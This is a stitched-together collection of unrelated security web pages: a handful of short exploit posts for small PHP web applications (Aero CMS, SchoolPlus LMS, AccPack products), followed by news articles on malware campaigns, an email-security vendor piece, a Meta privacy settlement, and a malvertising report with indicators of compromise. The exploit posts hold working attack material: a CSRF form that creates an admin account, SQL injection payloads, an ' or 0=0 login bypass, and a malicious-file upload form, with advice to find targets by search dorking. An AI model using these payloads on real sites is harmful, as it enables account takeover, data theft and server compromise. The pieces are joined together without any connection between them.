Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Aero CMS v0.0.1 CSRF Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user[+] save code as poc.html .<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST">  <div>    <label for="username">Username:</label>    <input type="text" id="username" name="username" required>  </div>  <div>    <label for="password">Password:</label>    <input type="password" id="password" name="password" required>  </div>  <div>    <label for="user_email">Email:</label>    <input type="email" id="user_email" name="user_email" required>  </div>  <div>    <label for="user_first_name">First Name:</label>    <input type="text" id="user_first_name" name="user_first_name" required>  </div>  <div>    <label for="user_last_name">Last Name:</label>    <input type="text" id="user_last_name" name="user_last_name" required>  </div>  <div>    <label for="user_image">Profile Image:</label>    <input type="file" id="user_image" name="user_image">  </div>  <div>    <label for="user_role">User Role:</label>    <select id="user_role" name="user_role" required>      <option value="admin">Admin</option>      <option value="editor">Editor</option>      <option value="subscriber">Subscriber</option>    </select>  </div>  <div>    <button type="submit" name="create_user">Create User</button>  </div></form>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Aero CMS 0.0.1 Cross Site Request Forgery

SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : SchoolPlus LMS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php?project_type_id=1[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here[+] Parameter: project_type_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: project_type_id=1 AND 5604=5604    Type: stacked queries    Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)    Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- ----Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SchoolPlus LMS 1.0 SQL Injection

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Cop v1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Cop 1.0 SQL Injection

AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Remote File Upload Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] use payload : <html><head>  <title>Add</title></head><body>  <div align="center"><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST"  enctype="multipart/form-data"><table>  <tr>    <td>Image</td><td>      <input type="file" name="image-upload" id="image-upload"></td>   </tr>   <tr>    <td>Status</td><td>      <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>      <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>    </td>   </tr>      <tr style='height:80'>    <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td>   </tr></table></form></div></body></html>[+] In the seventh line, we change the link to the target link.[+] Link to the uploaded files : cms/image/gallery/[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 Arbitrary File Upload

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.
The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.
"This form of attack is an

Malware / Software Development

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.

The activity cluster, dubbed **DEV#POPPER** and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.

"This form of attack is an advanced form of social engineering, designed to manipulate individuals into divulging confidential information or performing actions that they might normally not," Securonix researchers Den Iuzvyk and Tim Peck said in a new report shared with The Hacker News.

DEV#POPPER is the moniker assigned to an active malware campaign that tricks software developers into downloading booby-trapped software hosted on GitHub under the guise of a job interview. It shares overlaps with a campaign tracked by Palo Alto Networks Unit 42 under the name Contagious Interview.

Signs that the campaign was broader and cross-platform in scope emerged earlier this month when researchers uncovered artifacts targeting both Windows and macOS that delivered an updated version of a malware called BeaverTail.

The attack chain document by Securonix is more or less consistent in that the threat actors pose as interviewers for a developer position and urge the candidates to download a ZIP archive file for a coding assignment.

Present with the archive is an npm module that, once installed, triggers the execution of an obfuscated JavaScript (i.e., BeaverTail) that determines the operating system on which it's running and establishes contact with a remote server to exfiltrate data of interest.

It's also capable of downloading next-stage payloads, including a Python backdoor referred to as InvisibleFerret, which is designed to gather detailed system metadata, access cookies stored in web browsers, execute commands, upload/download files, as well as log keystrokes and clipboard content.

New features added to the recent samples include the use of enhanced obfuscation, AnyDesk remote monitoring and management (RMM) software for persistence, and improvements to the FTP mechanism employed for data exfiltration.

Furthermore, the Python script acts as a conduit to run an ancillary script that's responsible for stealing sensitive information from various web browsers – Google Chrome, Opera, and Brave – across different operating systems.

"This sophisticated extension to the original DEV#POPPER campaign continues to leverage Python scripts to execute a multi-stage attack focused on exfiltrating sensitive information from victims, though now with much more robust capabilities," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS

We’ll TL;DR the FUDdy introduction: we all know that phishing attacks are on the rise in scale and complexity, that AI is enabling more sophisticated attacks that evade traditional defenses, and the never-ending cybersecurity talent gap means we’re all struggling to keep security teams fully staffed. 
Given that reality, security teams need to be able to monitor and respond to threats

We'll TL;DR the FUDdy introduction: we all know that phishing attacks are on the rise in scale and complexity, that AI is enabling more sophisticated attacks that evade traditional defenses, and the never-ending cybersecurity talent gap means we're all struggling to keep security teams fully staffed.

Given that reality, security teams need to be able to monitor and respond to threats effectively and efficiently. You obviously can't let real threats slip past unnoticed, but you also can't afford to waste time chasing false positives.

In this post, we're going to look at some of the ways Material Security's unique approach to email security and data protection can dramatically–and quantifiably–save your security teams hours each week while improving the effectiveness of your security program.

**What's Your Alert Budget?**

Before we dive into the "how," let's take a moment to look at _why_ efficiency is critical in security operations. To do that, let's think about how many alerts can your security and incident response teams realistically triage, investigate, and respond to in a given day. Just like your department has a budget that limits how much money you can spend on people and tools, your security teams have a limit to the amount of time they can devote to responding to threats on any given day. **That's your alert budget**.

That number will change day-to-day, of course, depending on the severity and complexity of the incidents that pop, the number of critical strategic projects your team is working on, and myriad other factors. But there is a limit. And just as you can't afford to waste your limited financial resources on redundant tools or software that provides no value to your team, you can't afford for your teams to waste their alert budget investigating duplicate alerts, remediating the same issue over and over, or chasing false positives.

The efficiency with which your security team spends their alert budget is just as important as how you spend your money, if not more so. Now let's dive into how we help improve that efficiency.

**Balancing Accuracy and Sensitivity**

No matter how many alerts your team receives, there are a limited number of hours in any given day that your team can devote to responding to them. Material's approach to phishing has been built on the philosophy that we need to help our customers make the most of their time. The alerts we generate must both catch as many threats as possible–while also generating as few false positives as possible.

"Precision" and "recall" are terms that will be familiar to a data scientist, but may not immediately ring a bell for security folks. In the context of email detections, precision is a measure of how many emails flagged as malicious are actually malicious, while recall is a measure of how many of the actual malicious emails received are flagged by the system.

A security system that generates very few false positives has high precision, and a system that catches nearly all the threats it sees has high recall. At a certain granular level, there is some tradeoff between the two: as you can imagine, you can lower the number of false positives you generate by decreasing the sensitivity of the detections: but decreasing the sensitivity will often lead to true positives being missed as well. Conversely, you can minimize those missed true positives by turning the sensitivity way up, but doing so will generate more false positives.

The focus at Material has been to build a detection engine that balances the two effectively, and surfaces the malicious messages that you truly need to focus on. In today's increasingly-complex threat environment, no single layer of protection is sufficient–and no single method of detection can possibly strike the right balance on its own. To that end, the Material Detection Engine is made up of four key components:

*   **Material Detections:** A combination of machine learning techniques with rules built by our dedicated threat research team. AI and ML are great for connecting dots and finding relationships that humans may miss, but for all the advancements in AI lately, there's still no replacement for the insight and capability of human expertise. Material Detections are the best of both worlds.
*   **Custom Detections:** Every organization and every environment are unique, so we give customers the ability to create custom detections based on what you're seeing across your user base or out in the wild.
*   **Email Provider Alerts:** Google and Microsoft periodically issue alerts for phishing emails that they've detected post-delivery; we ingest and process those alerts and add them to our detections.
*   **User Reports:** Material automates your abuse mailbox, from ingesting user reports, consolidating similar messages within a single case, and applying automated protection immediately while providing flexible remediation flows to security teams.

All of these facets combine into a powerful and incredibly precise detection platform that gives our customers powerful protection without wasting their time with false positives and noise–striking what we believe to be the right balance between precision and recall. But while effectively balancing accuracy and sensitivity is critical, it's not enough: a modern email security platform also needs to streamline security operations themselves.

**Fool Me Twice, Shame on Me**

There's been a noticeable uptick in email attack campaigns that are not just wide-ranging but very personalized. There's debate about how much of this can be attributed to generative AI–the prevailing assumption was that the explosion of generative AI would give adversaries a new bag of tools to play with, but research like Verizon's 2024 DBIR show little meaningful impact on attacks and breaches at this point.

Regardless of whether these attacks are AI-generated or not, there's no denying they're on the rise. Sure, we all still get the generic and transparent '_are you available?'_ messages from our "CEOs" when we first join a new company. But we also get emails with fake invoices coming from domains that are spoofs or homoglyphs of trusted partners and vendors. We see complex pretexting attacks laying out completely believable stories from senders who appear to have connections with us. We receive emails from spoofed or homoglyph domains that fool even the most conscientious user.

And often these attacks are repeated across an organization, but tailored to each recipient. Not only do they evade native email security controls and make it through SEGs, but they appear as individual attacks. Subject lines, senders, and even body content can vary from email to email, making it hard to easily group them together–meaning your security team has to burn through multiple cycles to investigate and respond to dozens or hundreds of iterations of the exact same attack.

Material helps security and IR teams address this problem with automatic clustering of suspicious messages. When Material detects a potential threat, it automatically creates a Case within our platform. It then scours the entire environment for messages that match that case, based on a range of criteria. It looks for similarities among the usual fields, of course: matching senders, matching subject lines, matching body text, etc. But it also looks for things like the URLs embedded within the messages and attachment, matching attacks that are otherwise impossible to group by other means.

Material creates cases for all detected messages, and clusters similar messages together, simplifying investigation and remediation.

And when messages are clustered together in a single case, it makes triage, investigation, and even remediation significantly simpler. Speedbumps by default are automatically applied to _all_ the messages within the case–so your users will get a warning that the message may be malicious before your team even has a chance to investigate. And once you've investigated and applied a remediation to a single message within the case, every message in that case–even matched messages that are delivered after your investigation–receive that same remediation.

We've already seen powerful examples of how this helps our customers in the real world. One Material customer recently told us that they tracked their phishing email investigations over a three-month period. In those 90 days with Material Security's help, their SOC saved over 300 hours of time investigating and responding to phishing emails. All those hours stayed in their alert budget to deal with other pressing matters.

**Harnessing Your Organization's Collective Intelligence**

Today's workforce is well aware of phishing threats. That doesn't mean they don't still fall for them, of course, but it means they're on the lookout for suspicious, poorly-worded, or simply unexpected messages.

And it's important to get it right. No single line of defense is going to catch all inbound email threats, and for all the incredible advancements in AI and machine detections, sometimes there's no substitute for a keen-eyed employee noticing an email just doesn't pass the sniff test.

The downside is that _handling_ user reporting can also be a significant drain on your security team if not handled correctly. Duplicate reports, harmless emails flagged for review, the need to respond to the user(s) who flagged… when you add up the minutes all of these actions require over dozens or hundreds of reports every day, it can be a significant time suck.

Material automates the full lifecycle of user report response, applying immediate herd immunity to all messages within a reported message case across your entire organization.

Material cuts away the day-to-day backend slog of user reporting, automating your abuse mailbox to both speed remediation and save your security team time. Material automatically adds a speedbump to reported messages across your entire user base, providing an immediate layer of protection while your security team investigates the issue.

Granular remediation options allow your teams to speedbump, block links, or outright delete reported emails that turn out to be malicious. And thanks to case consolidation and similar message matching, when you've investigated and responded to one email, you've responded to every similar message in the entire case. Finally, Material automatically responds to reporters with an acknowledgement message–that you can change or update as your investigation proceeds if you wish.

Material simplifies and streamlines the process of ingesting and responding to user reporting, while adding immediate protection to provide air cover for investigations.

**Advanced Protection You Can Trust, Efficiency You Can Take to the Bank**

Your security teams have to juggle enough as it is. With Material Security, they'll chase far fewer false positives, triage and investigate phishing cases faster, and spend less time on administrative busywork with user reporting. Material frees up more of your alert budget so you can spend it on what really matters.

To see how much time you can give back to your security team, contact us for a demo today.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

How To Get the Most From Your Security Team’s Email Alert Budget

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign.
The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud.
"Of those 107,000 malware samples, over 99,000 of

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign.

The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud.

"Of those 107,000 malware samples, over 99,000 of these applications are/were unknown and unavailable in generally available repositories," mobile security firm Zimperium said in a report shared with The Hacker News. "This malware was monitoring one-time password messages across over 600 global brands, with some brands having user counts in the hundreds of millions of users."

Victims of the campaign have been detected in 113 countries, with India and Russia topping the list, followed by Brazil, Mexico, the U.S., Ukraine, Spain, and Turkey.

The starting point of the attack is the installation of a malicious app that a victim is tricked into installing on their device either through deceptive ads mimicking Google Play Store app listings or any of the 2,600 Telegram bots that serve as the distribution channel by masquerading as legitimate services (e.g., Microsoft Word).

Once installed, the app requests permission to access incoming SMS messages, following which it reaches out to one of the 13 command-and-control (C2) servers to transmit stolen SMS messages.

"The malware remains hidden, constantly monitoring new incoming SMS messages," the researchers said. "Its primary target is OTPs used for online account verification."

It's currently not clear who is behind the operation, although the threat actors have been observed accepting various payment methods, including cryptocurrency, to fuel a service called Fast SMS (fastsms\[.\]su) that allows customers to purchase access to virtual phone numbers.

It's likely that the phone numbers associated with the infected devices are being used without the owner's knowledge to register for various online accounts by harvesting the OTPs required for two-factor authentication (2FA).

In early 2022, Trend Micro shed light on a similar financially-motivated service that corralled Android devices into a botnet that could be used to "register disposable accounts in bulk or create phone-verified accounts for conducting fraud and other criminal activities."

"These stolen credentials serve as a springboard for further fraudulent activities, such as creating fake accounts on popular services to launch phishing campaigns or social engineering attacks," Zimperium said.

The findings highlight the continued abuse of Telegram, a popular instant messaging app with over 950 million monthly active users, by malicious actors for different purposes ranging from malware propagation to C2.

Earlier this month, Positive Technologies disclosed two SMS stealer families dubbed SMS Webpro and NotifySmsStealer that target Android device users in Bangladesh, India, and Indonesia with an aim to siphon messages to a Telegram bot maintained by the threat actors.

Also identified by the Russian cybersecurity company are stealer malware strains that masquerade as TrueCaller and ICICI Bank, and are capable of exfiltrating users' photos, device information, and notifications via the messaging platform.

"The chain of infection starts with a typical phishing attack on WhatsApp," security researcher Varvara Akhapkina said. "With few exceptions, the attacker uses phishing sites posing as a bank to get users to download apps from them."

Another malware that leverages Telegram as a C2 server is TgRAT, a Windows remote access trojan that has recently been updated to include a Linux variant. It's equipped to download files, take screenshots, and run commands remotely.

"Telegram is widely used as a corporate messenger in many companies," Doctor Web said. "Therefore, it is not surprising that threat actors can use it as a vector to deliver malware and steal confidential information: the popularity of the program and the routine traffic to Telegram's servers make it easy to disguise malware on a compromised network."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Deploy 100K+ Malware Android Apps to Steal OTP Codes

Meta, the parent company of Facebook, Instagram, and WhatsApp, agreed to a record $1.4 billion settlement with the U.S. state of Texas over allegations that it illegally collected biometric data of millions of users without their permission, marking one of the largest penalties levied by regulators against the tech giant.
"This historic settlement demonstrates our commitment to standing up to

Meta, the parent company of Facebook, Instagram, and WhatsApp, agreed to a record $1.4 billion settlement with the U.S. state of Texas over allegations that it illegally collected biometric data of millions of users without their permission, marking one of the largest penalties levied by regulators against the tech giant.

"This historic settlement demonstrates our commitment to standing up to the world's biggest technology companies and holding them accountable for breaking the law and violating Texans' privacy rights," Attorney General Ken Paxton said. "Any abuse of Texans' sensitive data will be met with the full force of the law."

The development arrived more than two years after the social media behemoth was sued for unlawfully capturing facial data belonging to Texas without their informed consent as is required by the law. The Menlo Park-based company, however, did not admit to any wrongdoing.

Tag Suggestions, as the feature was originally called when it was introduced in 2010, was marketed as a way for users to easily tag photos shared on Facebook with the names of people in them. However, it was enabled by default without giving adequate explanation as to how it worked.

The lawsuit accused Meta of violating the state's Capture or Use of Biometric Identifier (CUBI) Act and the Deceptive Trade Practices Act.

"Unbeknownst to most Texans, for more than a decade Meta ran facial recognition software on virtually every face contained in the photographs uploaded to Facebook, capturing records of the facial geometry of the people depicted," according to a press statement from the Attorney General's office.

"Meta did this despite knowing that CUBI forbids companies from capturing biometric identifiers of Texans, including records of face geometry, unless the business first informs the person and receives their consent to capture the biometric identifier."

In November 2021, Meta said it was discontinuing its "Face Recognition" system altogether and deleting a huge collection of more than a billion users' facial recognition templates as part of a wider initiative to limit the use of the technology across its products.

That same year, it agreed to pay a $650 million settlement in a 2015 class-action lawsuit in Illinois under the Biometric Information Privacy Act (BIPA) over similar allegations related to its face-tagging system.

Meta is not the only party being targeted by Texas over the collection of biometric data. The state also sued Google in October 2022 for allegedly violating the same biometric privacy law by gathering voice and facial data through products like Google Photos, Google Assistant, and Nest Hub Max. The case is currently underway.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Meta Settles for $1.4 Billion with Texas Over Illegal Biometric Data Collection

Only trust official sources they say, but what happens when a Google vetted ad is for a Google product?

We have previously reported on the brand impersonation issue with Google ads: users who search for popular keywords are shown malicious ads that purport to be from an official vendor.

Not only does this trick innocent victims into downloading malware or losing their data to phishing sites, it also erodes trust in brands and by association in Google Search itself.

Today, we show yet another example of brand misuse, except that this one targets Google itself. If you were trying to download the popular Google Authenticator (a multi-factor authentication program) via a Google search in the past few days, you may have inadvertently installed malware on your computer.

A similar distribution site and the same payload were previously reported by sandbox maker AnyRun. In this blog post, we will reveal the missing piece at the top of the killchain, namely the Google ad that was involved in tricking users into visiting a decoy website.

**Trust, but ‘verified’?**

The core issue with brand impersonation comes from ads that appear as if they were from official sources and advertisers’ identities verified by Google. This was the case here with this ad for Authenticator:

The truth is Larry Marr has nothing to do with Google, and is likely a fake account. We can follow what happens when you click on the ad by monitoring web traffic. We see a number of redirects via intermediary domains controlled by the attacker, before landing on a fake site for Authenticator.

**Fake site leads to signed payload hosted on Github**

The fraudulent site _chromeweb-authenticators\[.\]com_ was registered via NICENIC INTERNATIONAL GROUP CO., LIMITED on the same day as the ad was observed.

Looking at the site’s source code, we can see the code responsible for downloading _Authenticator.exe_ from GitHub. Note the comments from the author in Russian:

Hosting the file on GitHub allows the threat actor to use a trusted cloud resource, unlikely to be blocked via conventional means. While GitHub is the de facto software repository, not all applications or scripts hosted on it are legitimate. In fact, anyone can create an account and upload files, which is exactly what the threat actor did under the username _authe-gogle_, creating the _authgg_ repository that contains the malicious _Authenticator.exe_:

Looking at the file itself, we can see that it has been digitally signed by “_Songyuan Meiying Electronic Products Co., Ltd._” just one day before, and the signature is still valid at the time of writing:

The malware, DeerStealer, is a kind of stealer that will grab and exfitrate your personal data via an attacker-controlled website hosted at _vaniloin\[.\]fun_.

**Conclusion**

Threat actors have been abusing Google ads as a way to trick users into visiting phishing and malware sites. Since the whole premise of these attacks relies on social engineering, it is absolutely critical to properly distinguish real advertisers from fake ones.

As we saw in this case, some unknown individual was able to impersonate Google and successfully push malware disguised as a branded Google product as well.

We should note that Google Authenticator is a well-known and trusted multi factor authentication tool, so there is some irony in potential victims getting compromised while trying to improve their security posture. We recommend avoiding clicking on ads to download any kind of software and instead visiting the official repositories directly.

Malwarebytes blocks access to the fake Authenticator website, and we detect the payload as Spyware.DeerStealer.

**Indicators of Compromise**

Malicious domains

vcczen\[.\]eu  
tmdr7\[.\]mom  
chromeweb-authenticators\[.\]com

Payload (stealer)

5d1e3b113e15fc5fd4a08f41e553b8fd0eaace74b6dc034e0f6237c5e10aa737

C2

vaniloin\[.\]fun

Tag

#google